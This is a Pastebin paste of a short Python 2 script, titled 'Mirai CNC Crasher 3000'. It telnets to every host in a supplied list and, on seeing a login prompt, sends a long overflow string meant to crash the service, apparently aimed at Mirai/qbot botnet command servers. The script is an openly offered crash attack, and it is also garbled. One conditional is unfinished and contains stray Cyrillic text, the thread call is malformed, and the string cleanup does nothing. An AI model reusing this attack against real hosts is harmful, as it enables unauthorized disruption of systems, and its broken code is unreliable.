Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Mirai CNC Crasher 3000 By Sniggers
- # just put the mirai/qbot binary file that u want to crash
- import sys, telnetlib, time
- from threading import Thread
- filename = sys.argv[0]
- if len(sys.argv) < 2:
- sys.exit("Usage: %s <cnc file>")%filename
- host = open(sys.argv[1], "r").readlines()
- port = 23
- timeout = 3
- buff_ovaflow = "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
- tn = telnetlib.Telnet()
- def conn(keksome):
- try:
- tn.open(keksome, port, timeout)
- pdata = tn.read_all()
- if "sername" in pdata or "ogin" in pdata or "mпользователь"
- tn.write(buff_ovaflow)
- else:
- tn.close()
- print "[ERROR]: Couldn't Find Login Prompt On -> %s\n"%keksome
- for kek in host:
- kek.replace("https://", "")
- kek.replace("http://", "")
- kek.replace("/", "")
- proc = Thread(target=conn, args(host,))
- proc.start()
- time.sleep(0.8)
Advertisement
Add Comment
Please, Sign In to add comment